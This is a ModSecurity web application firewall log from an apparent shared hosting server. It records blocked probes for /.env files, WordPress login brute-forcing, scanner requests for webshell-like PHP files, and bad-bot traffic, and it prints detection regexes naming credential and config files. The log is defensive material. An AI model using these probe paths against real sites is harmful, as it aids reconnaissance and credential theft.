[Tue May 26 19:33:35.058900 2026] [security2:error] [pid 58470:tid 58630] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoNrnjVHRH3AGGvmYMfAAAAB4"]
[Tue May 26 19:33:35.067007 2026] [security2:error] [pid 58470:tid 58631] [client 176.65.139.239:37414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mahehealthcare.com.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahWoN7njVHRH3AGGvmYMhAAAAB8"]
[Tue May 26 19:33:36.447156 2026] [security2:error] [pid 58470:tid 58569] [remote 141.95.202.18:54382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWoOLnjVHRH3AGGvmYMpQAAaGI"]
[Tue May 26 19:33:37.028263 2026] [security2:error] [pid 58470:tid 58612] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoOLnjVHRH3AGGvmYMrAAAAAw"]
[Tue May 26 19:33:37.405494 2026] [security2:error] [pid 58470:tid 58719] [client 40.83.92.30:5983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/classwithtostring.php"] [unique_id "ahWoObnjVHRH3AGGvmYMxAAAAHc"]
[Tue May 26 19:33:37.405619 2026] [security2:error] [pid 58470:tid 58719] [client 40.83.92.30:5983] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/classwithtostring.php"] [unique_id "ahWoObnjVHRH3AGGvmYMxAAAAHc"]
[Tue May 26 19:33:37.692976 2026] [security2:error] [pid 58470:tid 58701] [client 104.28.32.14:56316] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWoObnjVHRH3AGGvmYMvAAAZUo"]
[Tue May 26 19:33:39.123469 2026] [security2:error] [pid 58470:tid 58628] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoOrnjVHRH3AGGvmYM5QAAABw"]
[Tue May 26 19:33:39.130861 2026] [security2:error] [pid 58470:tid 58568] [remote 216.73.216.30:35910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWoO7njVHRH3AGGvmYM-AAAbGE"]
[Tue May 26 19:33:39.212853 2026] [security2:error] [pid 58470:tid 58579] [remote 217.154.239.191:60618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.239.154.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoO7njVHRH3AGGvmYM8wAAAWw"]
[Tue May 26 19:33:39.476542 2026] [security2:error] [pid 58470:tid 58679] [client 40.83.92.30:5352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/info.php"] [unique_id "ahWoO7njVHRH3AGGvmYNAgAAAE8"]
[Tue May 26 19:33:39.476683 2026] [security2:error] [pid 58470:tid 58679] [client 40.83.92.30:5352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/info.php"] [unique_id "ahWoO7njVHRH3AGGvmYNAgAAAE8"]
[Tue May 26 19:33:39.602441 2026] [security2:error] [pid 58470:tid 58572] [remote 211.23.68.235:27578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWoO7njVHRH3AGGvmYNAQAAAGU"]
[Tue May 26 19:33:39.739153 2026] [security2:error] [pid 58470:tid 58566] [remote 74.7.241.58:44934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWoO7njVHRH3AGGvmYNCwAAaF8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:33:39.764529 2026] [security2:error] [pid 58470:tid 58695] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWoO7njVHRH3AGGvmYNCgAAAF8"]
[Tue May 26 19:33:39.764557 2026] [security2:error] [pid 58470:tid 58695] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWoO7njVHRH3AGGvmYNCgAAAF8"]
[Tue May 26 19:33:39.764741 2026] [security2:error] [pid 58470:tid 58624] [client 65.109.156.37:53155] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/homepages/portfolio-photo/"] [unique_id "ahWoO7njVHRH3AGGvmYNCAAAABg"]
[Tue May 26 19:33:40.603599 2026] [security2:error] [pid 58470:tid 58656] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoPLnjVHRH3AGGvmYNGAAAADg"]
[Tue May 26 19:33:41.334146 2026] [security2:error] [pid 58470:tid 58641] [client 40.83.92.30:5354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/ioxi-o.php"] [unique_id "ahWoPbnjVHRH3AGGvmYNOQAAACk"]
[Tue May 26 19:33:41.334276 2026] [security2:error] [pid 58470:tid 58641] [client 40.83.92.30:5354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/ioxi-o.php"] [unique_id "ahWoPbnjVHRH3AGGvmYNOQAAACk"]
[Tue May 26 19:33:41.999350 2026] [security2:error] [pid 58470:tid 58584] [remote 52.208.180.60:42110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.180.208.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoPbnjVHRH3AGGvmYNSAAAWXE"]
[Tue May 26 19:33:42.789409 2026] [security2:error] [pid 58470:tid 58645] [client 40.83.92.30:5320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/011i.php"] [unique_id "ahWoPrnjVHRH3AGGvmYNXAAAAC0"]
[Tue May 26 19:33:42.789501 2026] [security2:error] [pid 58470:tid 58645] [client 40.83.92.30:5320] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/011i.php"] [unique_id "ahWoPrnjVHRH3AGGvmYNXAAAAC0"]
[Tue May 26 19:33:43.761976 2026] [security2:error] [pid 58470:tid 58720] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoP7njVHRH3AGGvmYNdQAAAHg"]
[Tue May 26 19:33:44.405258 2026] [security2:error] [pid 58470:tid 58587] [remote 216.73.216.30:1114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWoQLnjVHRH3AGGvmYNiwAAXXQ"]
[Tue May 26 19:33:45.221512 2026] [security2:error] [pid 58470:tid 58714] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoQLnjVHRH3AGGvmYNmgAAAHI"]
[Tue May 26 19:33:45.331359 2026] [security2:error] [pid 58470:tid 58628] [client 40.83.92.30:5338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/edit.php"] [unique_id "ahWoQbnjVHRH3AGGvmYNqgAAABw"]
[Tue May 26 19:33:45.331459 2026] [security2:error] [pid 58470:tid 58628] [client 40.83.92.30:5338] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/edit.php"] [unique_id "ahWoQbnjVHRH3AGGvmYNqgAAABw"]
[Tue May 26 19:33:46.260271 2026] [security2:error] [pid 58470:tid 58477] [remote 121.200.216.55:44686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoQrnjVHRH3AGGvmYNxAAARQY"]
[Tue May 26 19:33:46.545981 2026] [security2:error] [pid 58470:tid 58490] [remote 52.208.180.60:42110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.180.208.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoQrnjVHRH3AGGvmYN2QAAKRM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:33:46.826815 2026] [security2:error] [pid 58470:tid 58640] [client 38.3.117.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoQrnjVHRH3AGGvmYNzgAAACg"]
[Tue May 26 19:33:47.019017 2026] [security2:error] [pid 58470:tid 58727] [client 114.119.138.130:24583] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahWoQ7njVHRH3AGGvmYN6wAAAH8"], referer: http://hibiware.jpn.org/bbs2/bbs.cgi/guitarseek.com/images.google.com.na/www.google.ae/krfan.ru/bbs.cgi?mode=past&page=480&pastlog=19618
[Tue May 26 19:33:47.128056 2026] [security2:error] [pid 58470:tid 58655] [client 40.83.92.30:5960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/sid3.php"] [unique_id "ahWoQ7njVHRH3AGGvmYN7wAAADc"]
[Tue May 26 19:33:47.128177 2026] [security2:error] [pid 58470:tid 58655] [client 40.83.92.30:5960] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/sid3.php"] [unique_id "ahWoQ7njVHRH3AGGvmYN7wAAADc"]
[Tue May 26 19:33:47.826412 2026] [security2:error] [pid 58470:tid 58723] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoQ7njVHRH3AGGvmYN9gAAAHs"]
[Tue May 26 19:33:48.584210 2026] [security2:error] [pid 58470:tid 58687] [client 98.158.235.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWoRLnjVHRH3AGGvmYOFgAAAFc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230238&moderation-hash=3a3980b7652b86885efc1959deb47371
[Tue May 26 19:33:49.059122 2026] [security2:error] [pid 58470:tid 58615] [client 40.83.92.30:5370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/load.php"] [unique_id "ahWoRbnjVHRH3AGGvmYOJgAAAA8"]
[Tue May 26 19:33:49.059224 2026] [security2:error] [pid 58470:tid 58615] [client 40.83.92.30:5370] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/load.php"] [unique_id "ahWoRbnjVHRH3AGGvmYOJgAAAA8"]
[Tue May 26 19:33:49.797763 2026] [security2:error] [pid 58470:tid 58703] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoRbnjVHRH3AGGvmYOMwAAAGc"]
[Tue May 26 19:33:50.007845 2026] [security2:error] [pid 58470:tid 58650] [client 176.65.139.234:18602] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env"] [unique_id "ahWoRrnjVHRH3AGGvmYOSAAAADI"]
[Tue May 26 19:33:50.774019 2026] [security2:error] [pid 58470:tid 58680] [client 40.83.92.30:5349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/166.php"] [unique_id "ahWoRrnjVHRH3AGGvmYOXwAAAFA"]
[Tue May 26 19:33:50.774153 2026] [security2:error] [pid 58470:tid 58680] [client 40.83.92.30:5349] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/166.php"] [unique_id "ahWoRrnjVHRH3AGGvmYOXwAAAFA"]
[Tue May 26 19:33:52.616793 2026] [security2:error] [pid 58470:tid 58676] [client 185.191.171.16:64770] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/day/2023-11-14/"] [unique_id "ahWoSLnjVHRH3AGGvmYOkwAAAEw"]
[Tue May 26 19:33:52.616927 2026] [security2:error] [pid 58470:tid 58676] [client 185.191.171.16:64770] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/day/2023-11-14/"] [unique_id "ahWoSLnjVHRH3AGGvmYOkwAAAEw"]
[Tue May 26 19:33:53.101046 2026] [security2:error] [pid 58470:tid 58652] [client 40.83.92.30:5989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/load.php"] [unique_id "ahWoSbnjVHRH3AGGvmYOqgAAADQ"]
[Tue May 26 19:33:53.101137 2026] [security2:error] [pid 58470:tid 58652] [client 40.83.92.30:5989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/load.php"] [unique_id "ahWoSbnjVHRH3AGGvmYOqgAAADQ"]
[Tue May 26 19:33:53.121484 2026] [security2:error] [pid 58470:tid 58725] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoSLnjVHRH3AGGvmYOmQAAAH0"]
[Tue May 26 19:33:53.745030 2026] [security2:error] [pid 58470:tid 58674] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoSbnjVHRH3AGGvmYOtQAAAEo"]
[Tue May 26 19:33:54.496919 2026] [security2:error] [pid 58470:tid 58595] [remote 31.24.155.180:46774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWoSrnjVHRH3AGGvmYO0gAAbHw"]
[Tue May 26 19:33:54.773033 2026] [security2:error] [pid 58470:tid 58514] [remote 31.24.155.180:46774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWoSrnjVHRH3AGGvmYO4gAAISs"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 19:33:56.478570 2026] [security2:error] [pid 58470:tid 58709] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoTLnjVHRH3AGGvmYO_gAAAG0"]
[Tue May 26 19:33:57.204407 2026] [security2:error] [pid 58470:tid 58639] [client 40.83.92.30:5364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/166.php"] [unique_id "ahWoTbnjVHRH3AGGvmYPHgAAACc"]
[Tue May 26 19:33:57.204506 2026] [security2:error] [pid 58470:tid 58639] [client 40.83.92.30:5364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/166.php"] [unique_id "ahWoTbnjVHRH3AGGvmYPHgAAACc"]
[Tue May 26 19:33:57.893013 2026] [security2:error] [pid 58470:tid 58661] [client 40.83.92.30:5367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-mail.php"] [unique_id "ahWoTbnjVHRH3AGGvmYPMwAAAD0"]
[Tue May 26 19:33:57.893101 2026] [security2:error] [pid 58470:tid 58661] [client 40.83.92.30:5367] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/wp-mail.php"] [unique_id "ahWoTbnjVHRH3AGGvmYPMwAAAD0"]
[Tue May 26 19:33:58.642308 2026] [security2:error] [pid 58470:tid 58651] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoTrnjVHRH3AGGvmYPSgAAADM"]
[Tue May 26 19:33:59.204787 2026] [security2:error] [pid 58470:tid 58551] [remote 216.73.216.30:1114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWoT7njVHRH3AGGvmYPXQAANVA"]
[Tue May 26 19:34:00.023031 2026] [security2:error] [pid 58470:tid 58703] [client 40.83.92.30:5345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/leaf.php"] [unique_id "ahWoULnjVHRH3AGGvmYPdAAAAGc"]
[Tue May 26 19:34:00.023163 2026] [security2:error] [pid 58470:tid 58703] [client 40.83.92.30:5345] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/leaf.php"] [unique_id "ahWoULnjVHRH3AGGvmYPdAAAAGc"]
[Tue May 26 19:34:00.889943 2026] [security2:error] [pid 58470:tid 58681] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoULnjVHRH3AGGvmYPfAAAAFE"]
[Tue May 26 19:34:01.683471 2026] [security2:error] [pid 58470:tid 58703] [client 40.83.92.30:5342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/grsiuk.php"] [unique_id "ahWoUbnjVHRH3AGGvmYPqAAAAGc"]
